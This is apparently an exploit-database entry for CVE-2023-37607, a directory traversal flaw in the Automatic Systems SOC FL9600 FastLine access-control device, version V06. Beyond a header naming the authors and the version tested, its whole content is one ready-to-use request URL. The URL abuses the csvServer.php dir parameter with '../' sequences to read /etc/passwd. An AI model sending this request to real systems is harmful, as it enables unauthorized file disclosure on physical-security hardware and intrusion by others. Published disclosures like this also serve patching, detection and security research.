id: 39373
date: 02/27/2024
title: Automatic Systems SOC FL9600 FastLine - Directory Transversal Vulnerability
author: Marcin Kozlowski
cves: 

# Exploit Title: Automatic-Systems SOC FL9600 FastLine - Directory Transversal
# Exploit Author: Mike Jankowski-Lorek, Marcin Kozlowski / Cqure
# Vendor Homepage: http://automatic-systems.com
# Software Link: 
# Version: V06
# Tested on: V06, VersionSVN = 28569_8a99acbd8d7ea09a57d5fbcb435da5427b3f6b8a
# CVE : CVE-2023-37607

Request URL: http://<host>/csvServer.php?getList=1&dir=../../../../etc/&file=passwd

#  0day.today [2024-02-28]  #